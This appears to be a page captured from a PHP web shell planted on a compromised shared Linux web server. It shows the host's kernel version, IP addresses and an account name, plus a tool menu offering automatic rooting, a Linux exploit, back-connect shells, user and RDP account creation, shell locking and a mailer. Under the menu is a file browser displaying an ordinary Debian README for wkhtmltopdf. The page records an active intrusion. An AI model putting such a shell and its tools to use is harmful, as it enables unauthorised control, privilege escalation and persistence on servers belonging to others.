Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
wkhtmltopdf /
[ HOME SHELL ]
Name
Size
Permission
Action
README.Debian
793
B
-rw-r--r--
README.md
468
B
-rw-r--r--
changelog.Debian.gz
1.11
KB
-rw-r--r--
copyright
2.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
Wkhtmltopdf without X server ---------------------------- Due to its dependency on Qt-WebKit, wkhtmltopdf requires an X11 server to run. If you want to provide an automated service or use wkhtmltopdf from a webserver, it could be convenient to use a virtual X11 server (like Xvfb). The xvfb Debian package contains a wrapper which makes it trivial: xvfb-run -- wkhtmltopdf [options] Another way (thanks to Dimitrios Zorbas on #847936) is to use the not well documented QT_QPA_* environment variables. The rendering (especially for fonts) could be uncertain but it could be useful in some cases. QT_QPA_FONTDIR=/usr/share/fonts/truetype/dejavu/ \ QT_QPA_PLATFORM=offscreen \ wkhtmltopdf [options] -- Emmanuel Bouthenot <kolter@debian.org> Tue, 27 Mar 2018 23:13:36 +0200
Close